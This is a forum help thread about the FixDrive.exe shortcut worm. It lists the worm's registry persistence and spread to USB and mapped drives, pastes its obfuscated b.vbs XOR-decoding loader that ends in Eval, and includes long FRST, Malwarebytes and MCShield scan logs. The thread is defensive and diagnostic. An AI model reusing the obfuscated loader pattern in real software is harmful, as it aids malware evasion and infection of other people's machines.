FixDrive.exe trojan/virus shortcut virus

Please help as I cannot clean this virus.
File infects removable storage and mapped drives.

Please see details as to where/how the virus infects a computer/server

Runs wscript.exe

Affected registry

"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run"
"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run"

"%userprofile%\AppData\Roaming\winsc32\b.vbs"
"%userprofile%\AppData\Roaming\winsc32"

The virus then hides all folders on a mapped drive or removable storage and creates shortcuts of the same folders

All shortcuts link to Fixdrive.exe

https://forum.avast.com/index.php?topic=53253.0

File infects removable storage and mapped drives.
MCShield will protect / fix > http://www.mcshield.net

Instructions for MCShield are found in the guide Eddy gave a link to.

Once you provide the requested logs, I will help clean your system. Without them, I do not know what to remove / fix.

Please follow the directions for scans in this topic and attach as many of the logs as you can run.
Logs to assist in cleaning malware

FRST.txt, Addition.txt, Malwarebytes Anti-Malware log and aswMBR.txt. Thanks.

Herewith the logs as requested, including the vbs script.

I also have the virus if you would like me to copy it.

I reinfected this pc as I manually removed the virus.

The virus is in a file Fixdrive.exe.
After executing the file the following happens:
wscript runs
b.vbs is copied to each drive, mapped and external.
C:\Users\Administrator\AppData\Roaming\winsc32

Also, the SystemInfon folder is created on each mapped and external drive, containing the b.vbs script.

ESET does not detect the virus, nor does Malware. MCSHIELD detected the virus; please see below.


b.vbs script

Set filesys1 = CreateObject("Scripting.FileSystemObject")

for iiiii = 16 to 17 step 1 : SUGGU = Replace(Split(QJYEK() , VbCrlf)(iiiii) , "REM *?:!","") : SYGYM = SYGYM & SUGGU : Next
AAA = Replace(NetworkFix(SYGYM , 1) , "" , "1")
N = NetworkFix("tITRDETppp" , 1)
Eval(N)

Function QJYEK() : Set F = CreateObject("Scripting.FileSystemObject") : M = F.OpenTextFile(WScript.ScriptFullName,1).ReadAll : QJYEK = M : End Function

Function NetworkFix(byval Data, byval opennp)
For i = 1 to len(Data) : a= i mod len(opennp): if a = 0 then a = len(opennp) : NetworkFix = NetworkFix & chr(asc(mid(opennp,a,1)) xor asc(mid(Data,i,1)))
Next
End Function

Malware

Malwarebytes Anti-Malware
www.malwarebytes.org

Scan Date: 8/21/2016
Scan Time: 9:58 AM
Logfile: malware.txt
Administrator: Yes

Version: 2.2.1.1043
Malware Database: v2016.08.21.01
Rootkit Database: v2016.08.15.01
License: Trial
Malware Protection: Enabled
Malicious Website Protection: Enabled
Self-protection: Disabled

OS: Windows 7 Service Pack 1
CPU: x64
File System: NTFS
User: Administrator

Scan Type: Threat Scan
Result: Completed
Objects Scanned: 434703
Time Elapsed: 21 min, 20 sec

Memory: Enabled
Startup: Enabled
Filesystem: Enabled
Archives: Enabled
Rootkits: Disabled
Heuristics: Enabled
PUP: Enabled
PUM: Enabled

Processes: 0
(No malicious items detected)

Modules: 0
(No malicious items detected)

Registry Keys: 0
(No malicious items detected)

Registry Values: 1
PUM.Optional.LowRiskFileTypes, HKU\S-1-5-18\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\ASSOCIATIONS|LowRiskFileTypes, .zip;.exe;.bat;.cmd;.reg;.msi;.vbs,.ps1, Quarantined, [11a4311cacee51e5a18525b12ed56898]

Registry Data: 5
PUM.Optional.WindowsToolDisabled, HKLM\SOFTWARE\POLICIES\MICROSOFT\WINDOWS NT\SYSTEMRESTORE|DisableConfig, 1, Good: (0), Bad: (1),Replaced,[cfe61a33f7a3c96d5b4d8cecc83ccc34]
PUM.Optional.WindowsToolDisabled, HKLM\SOFTWARE\WOW6432NODE\POLICIES\MICROSOFT\WINDOWS NT\SYSTEMRESTORE|DisableConfig, 1, Good: (0), Bad: (1),Replaced,[6b4a88c5c9d1a88e2c7cf58331d3b34d]
PUM.Optional.HomepageControl, HKU\S-1-5-21-4252029890-4273962779-3039932122-14456\SOFTWARE\POLICIES\MICROSOFT\INTERNET EXPLORER\CONTROL PANEL|HomePage, 1, Good: (0), Bad: (1),Replaced,[73429bb23e5c59dd40b4bdbb25df0ff1]
PUM.Optional.HomepageControl, HKU\S-1-5-21-4252029890-4273962779-3039932122-14598\SOFTWARE\POLICIES\MICROSOFT\INTERNET EXPLORER\CONTROL PANEL|HomePage, 1, Good: (0), Bad: (1),Replaced,[63525eefc6d4112554a013659f65a55b]
PUM.Optional.HomepageControl, HKU\S-1-5-21-4252029890-4273962779-3039932122-50297\SOFTWARE\POLICIES\MICROSOFT\INTERNET EXPLORER\CONTROL PANEL|HomePage, 1, Good: (0), Bad: (1),Replaced,[e4d1ce7f4c4ee65007ed7503ae56d927]

Folders: 0
(No malicious items detected)

Files: 0
(No malicious items detected)

Physical Sectors: 0
(No malicious items detected)

(end)

MCSHIELD

MCShield ::Anti-Malware Tool:: http://www.mcshield.net/

v 3.0.5.28 / DB: 2016.2.21.1 / Windows 7 <<<

8/21/2016 11:00:21 AM > Drive C: - scan started (System ~200 GB, NTFS HDD )…

C:\desktop.ini - Malware > Deleted. (16.08.21. 11.00 desktop.ini.513806; MD5: 6b1a6a9959ce35fa0df98f8e602bb191)

=> Malicious files : 1/1 deleted.


::::: Scan duration: 1sec ::::::::::::::::::


8/21/2016 11:00:21 AM > Drive D: - scan started (Data ~263 GB, NTFS HDD )…

D:\FixDrive.exe - Suspicious > Renamed. (MD5: c7141b586f3669c9468a4c95c0d4622e)

=> Suspicious files : 1/1 renamed.


::::: Scan duration: 6sec ::::::::::::::::::


Addition

Additional scan result of Farbar Recovery Scan Tool (x64) Version: 20-08-2016
Ran by Administrator (21-08-2016 10:25:19)
Running from C:\Users\Administrator\Downloads
Windows 7 Enterprise Service Pack 1 (X64) (2014-11-24 07:51:57)
Boot Mode: Normal

==================== Accounts: =============================

Administrator (S-1-5-21-3459921781-3051252704-3355898513-500 - Administrator - Enabled) => C:\Users\Administrator
ASPNET (S-1-5-21-3459921781-3051252704-3355898513-1001 - Limited - Enabled)
Guest (S-1-5-21-3459921781-3051252704-3355898513-501 - Limited - Disabled)

==================== Security Center ========================

(If an entry is included in the fixlist, it will be removed.)

AV: ESET Endpoint Antivirus 5.0 (Enabled - Up to date) {77DEAFED-8149-104B-25A1-21771CA47CD1}
AS: ESET Endpoint Antivirus 5.0 (Enabled - Up to date) {CCBF4E09-A773-1FC5-1F11-1A056723366C}
AS: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}

==================== Installed Programs ======================

(Only the adware programs with "Hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)

ABBYY FineReader 10 Corporate Edition (HKLM-x32.…{F1000000-0001-0000-0000-074957833700}) (Version: 10.00.221.7212 - ABBYY)
AbViewer (HKLM-x32.…{605F8C6F-CE62-449C-ADB3-9BD6DFE6EF6A}) (Version: 6.3 - SOFT GOLD Ltd.)
Adobe Acrobat X Pro - English, Français, Deutsch (HKLM-x32.…{AC76BA86-1033-F400-7760-000000000005}) (Version: 10.0.0 - Adobe Systems)
Adobe Flash Player 21 ActiveX (HKLM-x32.…{92C34178-B679-4C83-AC33-7EFCE6D36E01}) (Version: 21.0.0.182 - Adobe Systems Incorporated)
Adobe Flash Player 21 NPAPI (HKLM-x32.…{A7DC9721-4986-4179-BB89-A3E99545584C}) (Version: 21.0.0.182 - Adobe Systems Incorporated)
Adobe Reader XI (11.0.13) MUI (HKLM-x32.…{AC76BA86-7AD7-FFFF-7B44-AB0000000001}) (Version: 11.0.13 - Adobe Systems Incorporated)
Adobe Shockwave Player 12.1 (HKLM-x32.…{0E3C52E0-B4F1-4D1E-B172-E390813BD9FE}) (Version: 12.1.8.158 - Adobe Systems, Inc)
Apple Application Support (HKLM-x32.…{A83279FD-CA4B-4206-9535-90974DE76654}) (Version: 2.1.5 - Apple Inc.)
Autodesk Navisworks Freedom 2015 - English Language Pack (HKLM.…\Autodesk Navisworks Freedom 2015 - English Language Pack) (Version: 12.0.1109.12 - Autodesk)
Autodesk Navisworks Freedom 2015 - English Language Pack (Version: 12.0.1109.12 - Autodesk) Hidden
Autodesk Navisworks Freedom 2015 (HKLM.…\Autodesk Navisworks Freedom 2015) (Version: 12.0.1109.12 - Autodesk)
Autodesk Navisworks Freedom 2015 (Version: 12.0.1109.12 - Autodesk) Hidden
Autodesk Navisworks Freedom 2015 Deutsch (German) Language Pack (HKLM.…\Autodesk Navisworks Freedom 2015 Deutsch (German) Language Pack) (Version: 12.0.1100.17 - Autodesk)
Autodesk Navisworks Freedom 2015 Deutsch (German) Language Pack (Version: 12.0.1100.17 - Autodesk) Hidden
Bentley V8i (SELECTseries 3) - Autodesk® RealDWG™ 2014 (HKLM-x32.…{23E55F00-CE7A-4860-AF2A-69F3A5F8E54A}) (Version: 08.11.09.459 - Bentley Systems, Incorporated)
Bentley View V8i (SELECTseries 3) 08.11.09.459 (HKLM-x32.…{87D6CF41-5817-4725-8AB2-90E6B20EDE02}) (Version: 08.11.09.459 - Bentley Systems, Incorporated)
Broadcom 802.11 Wireless LAN Adapter (HKLM.…\Broadcom 802.11 Wireless LAN Adapter) (Version: 6.30.223.181 - Broadcom Corporation)
Broadcom Bluetooth Software (HKLM.…{A1439D4F-FD46-47F2-A1D3-FEE097C29A09}) (Version: 6.5.1.5000 - Broadcom Corporation)
Broadcom Wireless Utility (HKLM.…{4CDA59B9-7AD3-4283-9F5C-BC469FF975B6}) (Version: 6.30.223.181 - Broadcom Corporation)
CDB-Notes 2.3 (HKLM-x32.…{24204B47-2AC8-4B90-BAC0-3A472754768D}) (Version: 2.3 - CONTACT Software GmbH)
CDBurnerXP (HKLM.…{7E265513-8CDA-4631-B696-F40D983F3B07}_is1) (Version: 4.5.1.3868 - CDBurnerXP)
CIM DATABASE Desktop 9.8.54 (HKLM-x32.…{0FAC381B-F1D6-4722-B860-8C1B88F68EBD}) (Version: 9.8.54 - CONTACT Software GmbH)
Cisco EAP-FAST Module (x32 Version: 2.2.14 - Cisco Systems, Inc.) Hidden
Cisco LEAP Module (x32 Version: 1.0.19 - Cisco Systems, Inc.) Hidden
Cisco PEAP Module (x32 Version: 1.1.6 - Cisco Systems, Inc.) Hidden
Citrix Online Plug-in (HKLM-x32.…\CitrixOnlinePluginFull) (Version: 12.1.0.30 - Citrix Systems, Inc.)
Clear-Searchlist (HKLM-x32.…{A8E13425-3F2C-482C-8684-8E86FAED70D9}) (Version: 1.0 - Info AG Clientadministration)
Configuration Manager Client (x32 Version: 4.00.6487.2000 - Microsoft Corporation) Hidden
Cordaware bestinformed (HKLM-x32.…{AF85BC8A-C28E-4606-AE14-C087FE5EBEDD}) (Version: 5.1.03 - Cordaware GmbH Informationslogistik)
Cordaware bestinformed 5.1.0.3 (HKLM-x32.…\Cordaware Infoband_is1) (Version: 5.1.0.3 - Cordaware GmbH)
DHTML Editing Component (HKLM-x32.…{2EA870FA-585F-4187-903D-CB9FFD21E2E0}) (Version: 6.02.0001 - Microsoft Corporation)
DisplayLink Core Software (HKLM.…{AAB7AECC-6E0F-4312-9541-2EDF42F370F2}) (Version: 7.3.49122.0 - DisplayLink Corp.)
Engineering Client Viewer 7.0 (HKLM-x32.…\SAP_Engineering Client Viewer 7.0) (Version: - SAP AG)
EN-W7-InfoSlips_ForMe_InfoViewer_42 (HKLM-x32.…{766AD6A5-1177-438A-9560-F23BBCEB44C5}) (Version: 4.0.0.2 - InfoSlips)
ESET Endpoint Antivirus (HKLM.…{FF8AC853-B984-4C9A-937A-1F20FB6AA6B9}) (Version: 5.0.2126.0 - ESET, spol. s r.o.)
Extended Asian Language font pack for Adobe Reader XI (HKLM-x32.…{AC76BA86-7AD7-2530-0000-A00000000049}) (Version: 11.0.09 - Adobe Systems Incorporated)
Google Chrome (HKLM-x32.…\Google Chrome) (Version: 53.0.2785.34 - Google Inc.)
Google Update Helper (x32 Version: 1.3.31.5 - Google Inc.) Hidden
HiPath_CA_Hotkey (HKLM-x32.…{02774C11-2EC0-4645-8B09-E1019C162E31}) (Version: 1.00 - Siemens)
HP Connection Manager (HKLM-x32.…{04C23662-CE15-48BE-AF77-7BD9028934E7}) (Version: 4.6.14.1 - Hewlett-Packard Company)
HP ESU for Microsoft Windows 7 (HKLM-x32.…{A6365256-0FBA-4DCD-88CE-D92A4DC9328E}) (Version: 2.0.1.1 - Hewlett-Packard Company)
HP Hotkey Support (HKLM-x32.…{7F7E2060-7212-4A53-9875-55173E4BA3F0}) (Version: 5.0.21.1 - Hewlett-Packard Company)
HP Port Replicator Software Installer (HKLM-x32.…{6313BCDF-1109-4682-A19D-413189817787}) (Version: 1.3.25 - HP)
HP USB Docking Video (HKLM.…{B5C5096E-ABA9-4805-A5BC-4DC5E282B05A}) (Version: 7.3.49122.0 - Hewlett-Packard)
HTML Help Workshop (HKLM-x32.…\HTML Help Workshop) (Version: - )
IBM Cognos TM1 (HKLM-x32.…{AD063608-666F-4B6F-B66E-204661EE9CB2}) (Version: 9.5.20000.11857 - IBM Cognos TM1)
InfoSlips ForMe Viewer (HKLM-x32.…{43C6810F-620E-4B10-8AF3-315B5C85C794}) (Version: 5.2.13 - InfoSlips)
Intel(R) Network Connections Drivers (HKLM.…\PROSet) (Version: 18.1 - Intel)
IZArc 4.1.8 (HKLM-x32.…{97C82B44-D408-4F14-9252-47FC1636D23E}_is1) (Version: 4.1.8 - Ivan Zahariev)
Java 8 Update 77 (64-bit) (HKLM.…{26A24AE4-039D-4CA4-87B4-2F86418077F0}) (Version: 8.0.770.3 - Oracle Corporation)
Lotus Notes 8.5.3 (HKLM-x32.…{E36FB5F6-94FE-47BF-9FBE-6D8CBCFB0269}) (Version: 8.53.11258 - IBM)
Lotus Notes 8.5.3 MUI Pack for G1 (HKLM-x32.…{A68A664E-A638-43AD-9847-5BA379D2FDC8}) (Version: 8.53.11288 - IBM)
Malwarebytes Anti-Malware version 2.2.1.1043 (HKLM-x32.…\Malwarebytes Anti-Malware_is1) (Version: 2.2.1.1043 - Malwarebytes)
Microsoft .NET Framework 1.1 (HKLM-x32.…\Microsoft .NET Framework 1.1 (1033)) (Version: - )
Microsoft .NET Framework 4 Client Profile Language Pack - 日本語 (HKLM.…\Microsoft .NET Framework 4 Client Profile JPN Language Pack) (Version: 4.0.30319 - Microsoft Corporation)
Microsoft .NET Framework 4 Extended Language Pack - 日本語 (HKLM.…\Microsoft .NET Framework 4 Extended JPN Language Pack) (Version: 4.0.30319 - Microsoft Corporation)
Microsoft .NET Framework 4.5 DEU Language Pack (HKLM.…{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 1031) (Version: 4.5.50709 - Microsoft Corporation)
Microsoft .NET Framework 4.5.1 (HKLM.…{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 1033) (Version: 4.5.50938 - Microsoft Corporation)
Microsoft Mathematics-Add-In (32 Bit) (HKLM-x32.…{E2C98732-F973-4985-A9C5-DC06178E16EE}) (Version: 2.0.041222.01 - Microsoft Corporation)
Microsoft Office 2003 Web Components (HKLM-x32.…{90120000-00A4-0407-0000-0000000FF1CE}) (Version: 12.0.6213.1000 - Microsoft Corporation)
Microsoft Office Professional Plus 2010 (HKLM-x32.…\Office14.PROPLUS) (Version: 14.0.7015.1000 - Microsoft Corporation)
Microsoft redistributable runtime DLLs VS2008 SP1(x86) (HKLM-x32.…{A47A9101-6EB5-4314-BDA1-297880FBB908}) (Version: 9.0 - SAP AG)
Microsoft redistributable runtime DLLs VS2010 SP1 (x86) (HKLM-x32.…{2385C070-EC26-4AB9-8718-E605C977C0ED}) (Version: 10.0.40219.1 - SAP)
Microsoft Silverlight (HKLM.…{89F4137D-6C26-4A84-BDB8-2E5A4BB71E00}) (Version: 5.1.41212.0 - Microsoft Corporation)
Microsoft Visual C++ 2005 ATL Update kb973923 - x64 8.0.50727.4053 (HKLM.…{B6E3757B-5E77-3915-866A-CCFC4B8D194C}) (Version: 8.0.50727.4053 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32.…{7299052b-02a4-4627-81f2-1818da5d550d}) (Version: 8.0.56336 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (x64) (HKLM.…{071c9b48-7c32-4621-a0ac-3f809523288f}) (Version: 8.0.56336 - Microsoft Corporation)
Microsoft Visual C++ 2008 ATL Update kb973924 - x64 9.0.30729.4148 (HKLM.…{EE936C7A-EA40-31D5-9B65-8E3E089C3828}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.17 (HKLM.…{8220EEFE-38CD-377E-8595-13398D740ACE}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.4148 (HKLM.…{4B6C7001-C7D6-3710-913E-5BC23FCE91E6}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM-x32.…{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148 (HKLM-x32.…{1F1C2DFC-2D24-3E06-BCB8-725134ADF989}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2010 x64 Redistributable - 10.0.40219 (HKLM.…{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2010 x86 Redistributable - 10.0.30319 (HKLM-x32.…{196BB40D-1578-3D01-B289-BEFC77A11A1E}) (Version: 10.0.30319 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.60610 (HKLM-x32.…{a1909659-0a08-4554-8af1-2175904903a1}) (Version: 11.0.60610.1 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.60610 (HKLM-x32.…{95716cce-fc71-413f-8ad5-56c2892d4b3a}) (Version: 11.0.60610.1 - Microsoft Corporation)
MSXML 4.0 SP2 (KB954430) (HKLM-x32.…{86493ADD-824D-4B8E-BD72-8C5DCDC52A71}) (Version: 4.20.9870.0 - Microsoft Corporation)
MSXML 4.0 SP2 (KB973688) (HKLM-x32.…{F662A8E6-F4DC-41A2-901E-8C11F044BDEC}) (Version: 4.20.9876.0 - Microsoft Corporation)
MSXML4.0 redistributable (HKLM-x32.…{44D66AD9-AE19-4AFD-BE7E-A1B44C856697}) (Version: 4.0.0.0 - SAP)
Nero-Language-Switch (HKLM-x32.…{BE4CCB15-BD96-4EBA-93CB-4D55E6F5ED45}) (Version: 1.0 - INFO-AG)
OfficeLink 1.12 (HKLM-x32.…{D24F1EC4-456C-4575-B407-B0FA954FBB88}) (Version: 1.12 - CONTACT Software GmbH)
OpenProj (HKLM-x32.…{21BE26DE-96A8-430E-95CC-9028DC6A1B26}) (Version: 1.4.0 - Serena)
OpenText Imaging Windows Viewer 10.0.0 - German Language (HKLM-x32.…{99F50771-0D2E-4089-A191-BFDAB7642DE3}) (Version: 10.0.0 - OPENTEXT CORPORATION)
OpenText Imaging Windows Viewer 10.0.0 (HKLM-x32.…{89A62C6E-9F34-480E-953E-C2CCCE113C86}) (Version: 10.0.0 - OPENTEXT CORPORATION)
PDFCreator (HKLM.…{0001B4FD-9EA3-4D90-A79E-FD14BA3AB01D}) (Version: 2.1.2 - pdfforge)
QuickDic (HKLM-x32.…{2F320744-B21C-438C-8BEA-07B156B44FA5}) (Version: 7.3 - Stefan Büdenbender)
QuickTime (HKLM-x32.…{7BE15435-2D3E-4B58-867F-9C75BED0208C}) (Version: 7.71.80.42 - Apple Inc.)
SAP Business Explorer (HKLM-x32.…\SAPBI) (Version: 7.40 - SAP SE)
SAP GUI for Windows 7.40 (Patch 4 Hotfix 1) (HKLM-x32.…\SAPGUI) (Version: 7.40 Compilation 1 - SAP)
SAP Netweaver Business Client 5.0 (HKLM-x32.…\SAP_NWBC50) (Version: - SAP SE)
SEAL WD (HKLM-x32.…{55FA4E04-9EEF-443D-83AD-157772588841}) (Version: 1.4.6 - SEAL Systems AG)
Service Pack 2 for Microsoft Office 2010 (KB2687455) 32-Bit Edition (HKLM-x32.…{90140000-0011-0000-0000-0000000FF1CE}Office14.PROPLUS{DE28B448-32E8-4E8F-84F0-A52B21A49B5B}) (Version: - Microsoft)
Striata Reader (HKLM-x32.…{13d868cf-47e9-4b3d-9366-a0c60f82e5aa}) (Version: 2.9-1 - Striata Communication Solutions)
Synaptics Pointing Device Driver (HKLM.…\SynTPDeinstKey) (Version: 17.0.18.8 - Synaptics Incorporated)
Validity Fingerprint Sensor Driver (HKLM.…{F5850B80-27F9-406E-91D3-1329F813BA63}) (Version: 4.5.130.0 - Validity Sensors, Inc.)
vcredist_x86 (HKLM-x32.…{CEC7A786-A9C8-4EF7-BB59-6518E3B3C878}) (Version: 1.0.0 - SAP)
VLC.de media player (HKLM-x32.…\VLC.de media player) (Version: 2.2.1 - VideoLAN)
VLC.de Player (HKLM-x32.…{A431D5E1-A475-4584-AC03-A337DF5525C6}) (Version: 1.0.0 - hxxp://www.vinsvision.com)
Wrapper (HKLM-x32.…{E787DB81-936F-41DA-A345-523516C603F9}) (Version: 2.1 - phat consulting GmbH)
XnView 1.98 (HKLM-x32.…\XnView_is1) (Version: 1.98 - Gougelet Pierre-e)
XnView AddOns (HKLM-x32.…{93DCA3CC-A6CD-44A8-BD2D-6BC4B85201E3}) (Version: 1.00.0000 - Info AG)
XnView Shell Extension 3.2.0 (64bits) (HKLM-x32.…\XnView Shell Extension_is1) (Version: 3.2.0 - Gougelet Pierre-e)

Addition cont.

==================== Custom CLSID (Whitelisted): ==========================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

==================== Scheduled Tasks (Whitelisted) =============

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

Task: {510E4FFD-398F-4253-9FBB-AF002459B698} - System32\Tasks\Clear-Searchlist-User => C:\Program Files (x86)\INFO-AG\Clear-Searchlist\20121019-1000-User.exe [2012-11-23] ()
Task: {7292F30F-2B91-4B46-8D3B-9AB6E65BE3A4} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2016-02-02] (Google Inc.)
Task: {9B411B55-AE4E-4C7A-AF84-E82614B231BF} - System32\Tasks\Clear-Searchlist-Task => C:\Program Files (x86)\INFO-AG\Clear-Searchlist\20121019-1000-Task.exe [2012-11-23] ()
Task: {AF2E39DA-F3E7-451F-8DC7-F692A557C369} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2016-02-02] (Google Inc.)

(If an entry is included in the fixlist, the task (.job) file will be moved. The file which is running by the task will not be moved.)

Task: C:\WINDOWS\Tasks\GoogleUpdateTaskMachineCore.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
Task: C:\WINDOWS\Tasks\GoogleUpdateTaskMachineUA.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe

==================== Shortcuts =============================

(The entries could be listed to be restored or removed.)

==================== Loaded Modules (Whitelisted) ==============

2014-11-24 10:06 - 2008-03-20 18:16 - 00094208 _____ () C:\WINDOWS\System32\sealmon_amd64.dll
2013-06-05 12:35 - 2013-06-05 12:35 - 01102336 _____ () C:\Program Files (x86)\Hewlett-Packard\HP Connection Manager\System.Data.SQLite.dll
2016-07-29 08:40 - 2016-07-28 07:28 - 02280264 _____ () C:\Program Files (x86)\Google\Chrome\Application\53.0.2785.34\libglesv2.dll
2016-07-29 08:40 - 2016-07-28 07:27 - 00107848 _____ () C:\Program Files (x86)\Google\Chrome\Application\53.0.2785.34\libegl.dll
2013-06-05 12:35 - 2013-06-05 12:35 - 00514570 _____ () C:\Program Files (x86)\Hewlett-Packard\HP Connection Manager\sqlite3.dll
2013-09-05 00:14 - 2013-09-05 00:14 - 04300456 _____ () C:\Program Files (x86)\Common Files\microsoft shared\OFFICE14\Cultures\OFFICE.ODF

==================== Alternate Data Streams (Whitelisted) =========

(If an entry is included in the fixlist, only the ADS will be removed.)

==================== Safe Mode (Whitelisted) ===================

(If an entry is included in the fixlist, it will be removed from the registry. The "AlternateShell" will be restored.)

==================== Association (Whitelisted) ===============

(If an entry is included in the fixlist, the registry item will be restored to default or removed.)

==================== Internet Explorer trusted/restricted ===============

(If an entry is included in the fixlist, it will be removed from the registry.)

==================== Hosts content: ===============================

(If needed Hosts: directive could be included in the fixlist to reset Hosts.)

2009-07-14 04:34 - 2009-06-10 23:00 - 00000824 ____N C:\WINDOWS\system32\Drivers\etc\hosts

==================== Other Areas ============================

(Currently there is no automatic fix for this section.)

HKU\S-1-5-21-3459921781-3051252704-3355898513-500\Control Panel\Desktop\Wallpaper → C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Themes\TranscodedWallpaper.jpg
DNS Servers: 10.5.53.1 - 41.79.20.1
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 0) (ConsentPromptBehaviorUser: 0) (EnableLUA: 0)
Windows Firewall is enabled.

==================== MSCONFIG/TASK MANAGER disabled items ==

(Currently there is no automatic fix for this section.)

==================== FirewallRules (Whitelisted) ===============

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

FirewallRules: [SNMP-In-UDP] => (Allow) %SystemRoot%\system32\snmp.exe
FirewallRules: [SNMP-Out-UDP] => (Allow) %SystemRoot%\system32\snmp.exe
FirewallRules: [SNMP-In-UDP-NoScope] => (Allow) %SystemRoot%\system32\snmp.exe
FirewallRules: [SNMP-Out-UDP-NoScope] => (Allow) %SystemRoot%\system32\snmp.exe
FirewallRules: [SPPSVC-In-TCP] => (Allow) %SystemRoot%\system32\sppsvc.exe
FirewallRules: [SPPSVC-In-TCP-NoScope] => (Allow) %SystemRoot%\system32\sppsvc.exe
FirewallRules: [{3B786C65-B957-4246-8337-D49E9F254D78}] => (Allow) C:\Program Files (x86)\Common Files\Apple\Apple Application Support\WebKit2WebProcess.exe
FirewallRules: [{36DDB62F-42DE-40B5-B50C-1D077E34F3F1}] => (Allow) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe

==================== Restore Points =========================

==================== Event log errors: =========================

Application errors:

Error: (08/21/2016 08:11:01 AM) (Source: AutoEnrollment) (EventID: 6) (User: )
Description: local system0x8007054bThe specified domain either does not exist or could not be contacted.

Error: (08/21/2016 12:10:59 AM) (Source: AutoEnrollment) (EventID: 6) (User: )
Description: local system0x8007054bThe specified domain either does not exist or could not be contacted.

Error: (08/20/2016 06:05:19 PM) (Source: AutoEnrollment) (EventID: 6) (User: )
Description: local system0x8007054bThe specified domain either does not exist or could not be contacted.

Error: (08/20/2016 04:13:49 PM) (Source: AutoEnrollment) (EventID: 6) (User: )
Description: local system0x8007054bThe specified domain either does not exist or could not be contacted.

Error: (08/20/2016 04:12:09 PM) (Source: AutoEnrollment) (EventID: 6) (User: )
Description: local system0x8007054bThe specified domain either does not exist or could not be contacted.

Error: (08/20/2016 03:11:36 PM) (Source: AutoEnrollment) (EventID: 6) (User: )
Description: local system0x8007054bThe specified domain either does not exist or could not be contacted.

Error: (08/20/2016 01:27:09 PM) (Source: AutoEnrollment) (EventID: 6) (User: )
Description: local system0x8007054bThe specified domain either does not exist or could not be contacted.

Error: (08/20/2016 01:25:49 PM) (Source: AutoEnrollment) (EventID: 6) (User: )
Description: local system0x8007054bThe specified domain either does not exist or could not be contacted.

Error: (08/19/2016 08:44:14 PM) (Source: AutoEnrollment) (EventID: 6) (User: )
Description: local system0x8007054bThe specified domain either does not exist or could not be contacted.

Error: (08/19/2016 08:02:25 PM) (Source: AutoEnrollment) (EventID: 6) (User: )
Description: local system0x8007054bThe specified domain either does not exist or could not be contacted.

==================== Memory info ===========================

Processor: Intel(R) Core™ i5-4210U CPU @ 1.70GHz
Percentage of memory in use: 73%
Total physical RAM: 3513.11 MB
Available physical RAM: 927.2 MB
Total Virtual: 7024.4 MB
Available Virtual: 3658.57 MB

==================== Drives ================================

Drive c: (System) (Fixed) (Total:200 GB) (Free:144.48 GB) NTFS
Drive d: (Data) (Fixed) (Total:262.81 GB) (Free:166.79 GB) NTFS

==================== MBR & Partition Table ==================

========================================================
Disk: 0 (MBR Code: Windows 7 or 8) (Size: 465.8 GB) (Disk ID: 09D698D1)
Partition 1: (Active) - (Size=300 MB) - (Type=07 NTFS)
Partition 2: (Not Active) - (Size=200 GB) - (Type=07 NTFS)
Partition 3: (Not Active) - (Size=265.5 GB) - (Type=0F Extended)

==================== End of Addition.txt ============================

Scan result of Farbar Recovery Scan Tool (FRST) (x64) Version: 20-08-2016
Ran by Administrator (administrator) on ZA-ON-P0-7-1094 (21-08-2016 10:24:06)
Running from C:\Users\Administrator\Downloads
Loaded Profiles: Administrator (Available Profiles: Administrator & EBRAHIMM & THABAS)
Platform: Windows 7 Enterprise Service Pack 1 (X64) Language: English (United States)
Internet Explorer Version 9 (Default browser: IE)
Boot Mode: Normal
Tutorial for Farbar Recovery Scan Tool: http://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/

==================== Processes (Whitelisted) =================

(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)

(Hewlett-Packard Company) C:\Windows\System32\hpservice.exe
(DisplayLink Corp.) C:\Program Files\DisplayLink Core Software\DisplayLinkManager.exe
(Validity Sensors, Inc.) C:\Windows\System32\vcsFPService.exe
(Microsoft Corporation) C:\Windows\System32\wlanext.exe
(Broadcom Corporation) C:\Program Files\Broadcom\Broadcom 802.11\WLTRYSVC.EXE
(Broadcom Corporation) C:\Program Files\Broadcom\Broadcom 802.11\BCMWLTRY.EXE
(IBM Corp) C:\Program Files (x86)\IBM\Lotus\Notes\nslsvice.exe
